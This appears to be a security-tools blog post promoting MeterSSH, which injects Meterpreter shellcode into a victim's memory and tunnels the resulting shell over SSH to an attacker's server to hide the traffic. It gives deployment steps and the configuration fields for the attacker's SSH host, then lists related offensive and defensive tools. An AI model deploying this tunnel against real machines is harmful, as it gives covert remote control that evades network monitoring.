MeterSSH - Meterpreter over SSH

MeterSSH is a way to take shellcode, inject it into memory then tunnel whatever port you want to over SSH to mask any type of communications as a normal SSH connection.

The way it works is by injecting shellcode into memory, then wrapping a port spawned (meterpreter in this case) by the shellcode over SSH back to the attacker's machine. Then connecting with meterpreter's listener to localhost will communicate through the SSH proxy, to the victim through the SSH tunnel. All communications are relayed through the SSH tunnel and not through the network.

Features:

• Meterpreter over SSH
• Ability to configure different IP's, addresses, etc. without the need to ever change the shellcode.
• Monitor for the SSH connection and automatically spawn the shell

Usage:

There are two files, monitor.py and meterssh.py.

monitor.py - run this in order to listen for an SSH connection, it will poll for 8021 on localhost for an SSH tunnel then spawn Metasploit for you automatically to grab the shell. meterssh.py - this is what you would deploy to the victim machine - note that most windows machines wont have Python installed, its recommended to compile Python with py2exe or pyinstaller.

Fields you need to edit inside meterssh.py

  user = "sshuser"
# password for SSH
password = "sshpw"
# this is where your SSH server is running
rhost = "192.168.1.1"
# remote SSH port - this is the attackers SSH server
port = "22"
  

user - this is the user account for the attackers SSH server (do not use root, does not need root) password - this is the password for the attackers SSH server rhost - this is the attackers SSH server IP address port - this is the attackers SSH server port

You don't need to change the Metasploit shellcode, the Metasploit shellcode is simply an unmodified windows/meterpreter/bind_tcp that binds to port 8021. If you want to change this, just switch the shellcode out and change port 8021 inside the script to bind to whatever port you want to. You do not need to do this however unless you want to customize/modify.

Download MeterSSH

You might also like:

• Advanced Encryption Package - A File Encryption Software for Windows
• Haveged - A Simple Entropy Daemon
• FGscanner - An Open-source URL Scanner
• Havij - Automated SQL Injection Tool
• DVIA - Damn Vulnerable iOS Application
• WAF-FLE - An Open-source ModSecurity Console
• ParameterFuzz - Web Application Security Scanner
• Dumb0 - Simple Script To Harvest Usernames From Popular Forums and CMS
• Burp CO2 - A Collection Of Enhancements for Burp Suite
• Maltrieve - Tool To Retrieve Malware Directly From the Source
• Rekall - Memory Forensic Framework
• Anonymous FTP Scanner - Anonymous FTP Finder for Windows
• Rootkit Hunter - Security Monitoring and Analyzing Tool
• Quarks PwDump - Tool To Extract Credentials From Windows Operating Systems
• iGoat - A Deliberately Insecure iOS Application
• Charles - A Web Debugging Proxy for Windows, Mac OS, and Linux
• pMap - Tool for Passive Discovery, Scanning, and Fingerprinting
• Killtrojan Syslog - Tool To Detect Malware Activity On a System
• Azazel - Userland Anti-debugging & Anti-detection Rootkit
• Pac4Mac - Forensics Framework for Mac OS X

from Effect Hacking full article here